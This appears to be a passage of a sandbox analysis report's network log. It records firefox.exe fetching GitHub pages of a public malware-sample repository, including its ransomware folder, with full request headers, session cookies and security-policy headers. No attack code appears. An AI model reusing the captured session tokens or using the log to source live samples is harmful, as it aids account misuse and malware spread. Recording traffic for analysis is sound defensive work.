                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 204
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          cache-control: no-cache
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          x-github-request-id: C31B:3BC911:17A9B7:1BB24D:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/security/overall-count
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/security/overall-count HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/fragment+html
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: text/fragment+html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          cache-control: max-age=14400, private
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 20
                          x-github-request-id: C31B:3BC911:17A9B7:1BB24B:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"da2fb7fc841243aeeb0f0b5e00622b6a"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-html-safe: 33e84c7bdcf00760a1e8e79a298b669303c5a66565534ab525c26b9ca425589f
                          content-length: 463
                          x-github-request-id: C31B:3BC911:17A9B8:1BB250:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/used_by_list
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/used_by_list HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/fragment+html
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: text/plain; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          cache-control: no-cache
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 20
                          x-github-request-id: C31B:3BC911:17A9B8:1BB24E:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/contributors_list?count=5&current_repository=MalwareDatabase&items_to_show=5
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/contributors_list?count=5&current_repository=MalwareDatabase&items_to_show=5 HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"6ca9b2649cfe1e58c896333ecef2b349"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 1130
                          x-github-request-id: C31B:3BC911:17A9B2:1BB246:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/fluidicon.png
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /fluidicon.png HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          content-type: image/png
                          content-length: 33270
                          last-modified: Mon, 27 Jan 2025 16:53:35 GMT
                          etag: "6797ba0f-81f6"
                          vary: Accept-Encoding, Accept, X-Requested-With
                          x-frame-options: DENY
                          accept-ranges: bytes
                          x-github-request-id: C31B:3BC911:17A9EE:1BB289:6797C1BE
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html, application/xhtml+xml, application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase
                          turbo-visit: true
                          x-react-app-name: repos-overview
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"134621081d3501453abea3a3160ad737"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ 